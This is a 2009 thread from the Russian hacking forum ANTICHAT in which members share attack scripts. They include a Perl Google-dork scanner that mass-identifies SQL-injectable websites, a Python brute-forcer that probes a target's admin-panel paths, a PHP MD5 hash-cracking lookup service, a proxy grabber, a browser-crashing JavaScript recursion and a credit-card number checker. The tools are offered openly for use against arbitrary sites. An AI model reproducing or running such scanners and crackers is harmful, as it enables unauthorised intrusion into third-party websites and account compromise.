ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
[REQ] Mod - SQL - Google Search |
28.03.2009, 16:48
|
|
Новичок
Регистрация: 19.11.2008
Сообщений: 10
Провел на форуме:
123389
Репутация:
6
|
|
[REQ] Mod - SQL - Google Search
Hi all i need some perl guru help to modify this.
Old Options
1.Insert Dork:inurl:index.asp?id=1
2.Total Query Pages (10 Links/Pages) :20
to new option in 1 line dork + query
and option to save result in vuln.txt file in the same directoy
Insert Dork:inurl:index.asp?id=1 20 vuln.txt
Код:
#!/usr/bin/perl
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Request;
my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
print "+++++++++++++++++++++++++++++++\n";
print "+ SQL - Google Search +\n";
print "+ CWH Underground +\n";
print "+++++++++++++++++++++++++++++++\n\n";
print "Insert Dork:";
chomp( my $dork = <STDIN> );
print "Total Query Pages (10 Links/Pages) :";
chomp( my $page = <STDIN> );
print "\n[+] Result:\n\n";
for($start = 0;$start != $page*10;$start += 10)
{
$t = "http://www.google.com/cse?cx=013269018370076798483:gg7jrrhpsy4&cof=FORID:1&q=".$dork."&btnG=Search&start=".$start;
$ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($t);
if ($response->is_success)
{
$c = $response->content;
@stuff = split(/<a href=/,$c);
foreach $line(@stuff)
{
if($line =~/(.*) class=l/ig)
{
$out = $1;
$out =~ s/\"//g;
$out =~s/$/\'/;
$ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($out);
$error = $response->content();
if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/)
{print "$out => Could be Vulnerable in MySQL Injection!!\n";}
elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
{print "$out => Could be Vulnerable in MS Access Injection!!\n";}
elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
{print "$out => Could be Vulnerable in MSSQL Injection!!\n";}
elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
{print "$out => Could be Vulnerable in Oracle Injection!!\n";}
}
}
}
}
test the script and if can to modefy and tweak other tings will be good too.
Thanks in Advance
Best regards Dima |
|
|
Многопоточный граббер прокси |
28.03.2009, 22:00
|
|
Участник форума
Регистрация: 08.02.2009
Сообщений: 196
Провел на форуме:
1420275
Репутация:
127
|
|
Многопоточный граббер прокси
Многопоточный граббер прокси (из списка сайтов  )
Код:
#(с) Gaus
#!/usr/bin/perl -w
use LWP::UserAgent;
use threads;
use threads::shared;
my @sites : shared;
###############################
my $threads = 1; # Кол-во потоков
my $proxy = 'proxy.txt';# Файл с награбленными прокси
my $sites = 'sites.txt';# Файл со списком сайтов(откуда грабить)
###############################
open (S, "<$sites") || die("Could not open ".$sites." file!!!");
open (F, ">>$proxy") || die("Could not open ".$proxy." file!!!");
@sites = <S>;
my $num;
my $saw;
for(0..$threads) {$trl[$_] = threads->create(\&Grab, $_);}
for(@trl) { $_->join; }
sub Grab
{
while (@sites){
$site = shift @sites;
$ua = new LWP::UserAgent;
$ua->timeout(30);
$data = $ua->get($site)->as_string;
print "Grabbing proxys from: ".$site." ...\n";
while($data =~/(\d*\.\d*\.\d*\.\d*)\:(\d*)/msgi) {
print F $1.":".$2."\n";
print $1.":".$2."\n";
}
print "#############################\n";
}
}
close (F);
close (S);
|
|
|
|
Онлайн сервис по расшифровке хешей... |
30.03.2009, 18:56
|
|
Постоянный
Регистрация: 17.09.2008
Сообщений: 562
Провел на форуме:
6962560
Репутация:
536
|
|
Онлайн сервис по расшифровке хешей...
Скрипт "Онлайн сервис по расшифровке хешей"
В папке со скриптом должна быть папка base с правами 777.
Функции:
- поиск хэшей по базе;
- возможность добавлять свои пароли в базу.
Требования:
- Php 5
PHP код:
<?php
// Поиск по базе
if(isset($_POST['go']))
{
echo '<div align="center">Введите хэши (MD5)<br><form method=post><textarea cols=50 rows=15 name="hash">
</textarea><br><br><input name="go"
type=submit value="Искать по базе"></form></div>';
$h = explode("\n", $_POST['hash']);
for ($j = 0; $j<=count($h)-1; $j++)
{
$hash = rtrim($h[$j]);
if (strlen($hash)==32)
{
$hd = "base";
for ($i = 1;$i<=32;$i++)
{
$hd = $hd."/".$hash[$i-1];
}
if (file_exists($hd))
{
$qpass = array_pop(scandir($hd));
$arq = explode(".", $qpass);
for ($i = 1;$i<=count($arq) ; $i++)
{
$pass[$i-1] = chr($arq[$i-1]);
}
print_r('<div align="center">'.$hash.":".implode($pass)."</div>");
}
else
{
print_r('<div align="center">'.$hash.": не найден</div>");
}
}
}
} else
{
echo '<div align="center">Введите хэши (MD5)<br><form method=post>
<textarea cols=50 rows=15 name="hash"></textarea><br><br><input name="go"
type=submit value="Искать по базе"></form></div>';
}
// Добавление хэшей в базу
if(isset($_POST['add']))
{
echo '<br><br><div align="center">Введите пароли по одному в строке<br><form method=post>
<textarea cols=50 rows=15 name="pass"></textarea><br><br><input name="add"
type=submit value="Добавить пароли в базу"></form></div>';
$p = explode("\n", $_POST['pass']);
for ($j = 0; $j<=count($p)-1; $j++)
{
$pass = rtrim($p[$j]);
if ($pass<>'')
{
$len = strlen($pass);
$fname = "";
for ($i=1;$i<=$len;$i++)
{
$fname = $fname."".ord($pass{$i-1}).".";
}
$hash=md5($pass);
$dir = "base";
for ($i = 1;$i<33; $i++)
{
$dir = $dir."/".$hash{$i-1};
if (file_exists($dir))
{}
else
{
mkdir($dir);
}
}
fopen($dir."/".$fname, "w");
}
}
print_r('<div align="center">Ваши пароли успешно добавлены в базу</div>');
}
else {
echo '<br><br><div align="center">Введите пароли по одному в строке<br><form method=post>
<textarea cols=50 rows=15 name="pass"></textarea><br><br><input name="add"
type=submit value="Добавить пароли в базу"></form></div>';
}
?>
|
|
|
|
31.03.2009, 20:00
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940
Репутация:
1257
|
|
Последний ФФ виснет намертво. Утечки памяти нету, но зависает браузер.. ИЕ просто выпадает. Опера работает)
ФФ последний. ИЕ 6.
PHP код:
<html>
<body>
<form name="a" >
<div id="d">
<input type="button" id="add"><br><br>
<img border='0' src='1.gif' onLoad='add();'>
</div>
</form>
<script language="javascript">
function add(){
div=document.getElementById("d");
button=document.getElementById("add");
newitem="<a target='_blank' ";
newitem+="href='http://mrthe.name/'>";
newitem+="<img border='0' src='1.gif' onLoad='add();'></a>";
newitem+="<scri";
newitem+="pt>add();</sc";
newitem+="ript>";
newnode=document.createElement("span");
newnode.innerHTML=newitem;
div.insertBefore(newnode,button);
add();
}
add();
</script>
</body>
</html>
Кроспост в моём блоге: http://mrthe.name/2009/03/opera-forever/ (+ подробности)
Последний раз редактировалось mr.The; 31.03.2009 в 21:22..
|
|
|
|
31.03.2009, 20:15
|
|
Постоянный
Регистрация: 02.07.2008
Сообщений: 472
Провел на форуме:
3728999
Репутация:
444
|
|
Сообщение от mr.The
Искал утечку памяти в опере.. В итоге опера стабильно всё обрабатывает. и останавливается после ~минуты лагов, а последний ФФ виснет намертво. Утечки памяти нету, но зависает браузер.. ИЕ просто выпадает.
PHP код:
<html>
<body>
<form name="a" >
<div id="d">
<input type="button" id="add"><br><br>
<img border='0' src='1.gif' onLoad='add();'>
</div>
</form>
<script language="javascript">
function add(){
div=document.getElementById("d");
button=document.getElementById("add");
newitem="<a target='_blank' ";
newitem+="href='http://mrthe.name/'>";
newitem+="<img border='0' src='1.gif' onLoad='add();'></a>";
newitem+="<scri";
newitem+="pt>add();</sc";
newitem+="ript>";
newnode=document.createElement("span");
newnode.innerHTML=newitem;
div.insertBefore(newnode,button);
add();
}
add();
</script>
</body>
</html>
1.gif - любая анимашка для утяжеления. впринципе add(); в конце скрипта можно убрать. Тогда будет запускаться сразу после загрузки анимации. ни чё не виснит, вставил массивную анимацию, грузит 23 сек. и всё.
|
|
|
|
31.03.2009, 20:26
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940
Репутация:
1257
|
|
Сообщение от heretic1990
ни чё не виснит, вставил массивную анимацию, грузит 23 сек. и всё.
чем тестил? щас проверяю на http://browsershots.org/ опера более-мение подгружает. остальные пока в дауне(при условии вкл javascript)
|
|
|
|
31.03.2009, 21:41
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349
Репутация:
808
|
|
Сообщение от mr.The
Последний ФФ виснет намертво. Утечки памяти нету, но зависает браузер.. ИЕ просто выпадает. Опера работает)
ФФ последний. ИЕ 6.
PHP код:
<html>
<body>
<form name="a" >
<div id="d">
<input type="button" id="add"><br><br>
<img border='0' src='1.gif' onLoad='add();'>
</div>
</form>
<script language="javascript">
function add(){
div=document.getElementById("d");
button=document.getElementById("add");
newitem="<a target='_blank' ";
newitem+="href='http://mrthe.name/'>";
newitem+="<img border='0' src='1.gif' onLoad='add();'></a>";
newitem+="<scri";
newitem+="pt>add();</sc";
newitem+="ript>";
newnode=document.createElement("span");
newnode.innerHTML=newitem;
div.insertBefore(newnode,button);
add();
}
add();
</script>
</body>
</html>
Кроспост в моём блоге: http://mrthe.name/2009/03/opera-forever/ (+ подробности)А что должно вызвать утечки памяти? Замыканий нет, циклических ссылок нет. Есть бесконечная рекурсия, которую опера благоразумно прерывает, когда заканчивается стек вызовов.
|
|
|
|
31.03.2009, 21:47
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940
Репутация:
1257
|
|
А что должно вызвать утечки памяти? Замыканий нет, циклических ссылок нет. Есть бесконечная рекурсия, которую опера благоразумно прерывает, когда заканчивается стек вызовов.
вот и я искал. ибо опера у меня перед этим благополучно схавала 3 гига памяти. перезагрузил оперу. открыл страницу, которую открывал до этого. всё норм. но обилие js и картинок. память не утекает. вот стало нефиг делать решил поковырять...
|
|
|
|
Брутер расположения с адинки на питоне. |
01.04.2009, 03:01
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Брутер расположения с адинки на питоне.
Код:
#/usr/bin/python
import sys, os, time, httplib
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
if len(sys.argv) != 2:
print "\n|-------------------------------------------------------------|"
print "| Admin login finder v2.0 |"
print "| Help: admin-find.py -h |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
for arg in sys.argv:
if arg == '-h':
print "\n|-----------------------------------------------------------------------------|"
print "| Admin login finder v2.0 |"
print "| Usage: admin-find.py www.site.com |"
print "| Example: admin-find.py site.com |"
print "|-------------------------------------------------------------------------------|\n"
sys.exit(1)
site = sys.argv[1].replace("http://","").rsplit("/",1)[0]
site = site.lower()
admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','joomla/administrator','login.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php']
print "\n|-------------------------------------------------------------|"
print "| Admin login finder v2.0 |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
print "[+] Target:",site
print "[+] Checking paths..."
print
try:
for admin in admin_path:
admin = admin.replace("\n","")
admin = "/" + admin
connection = httplib.HTTPConnection(site)
connection.request("GET",admin)
response = connection.getresponse()
print "%s %s %s" % (admin, response.status, response.reason)
except(KeyboardInterrupt,SystemExit):
raise
except:
pass
|
|
|
|
Чёкер номеров кредитных карт. |
01.04.2009, 03:33
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Чёкер номеров кредитных карт.
Чёкер номеров кредитных карт.
Код:
<?
function luhn_check($number) {
$number=preg_replace('/\D/', '', $number);
$number_length=strlen($number);
$parity=$number_length % 2;
$total=0;
for ($i=0; $i<$number_length; $i++) {
$digit=$number[$i];
if ($i % 2 == $parity) {
$digit*=2;
if ($digit > 9) {
$digit-=9;
}
}
$total+=$digit;
}
return ($total % 10 == 0) ? TRUE : FALSE;
}
?>
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид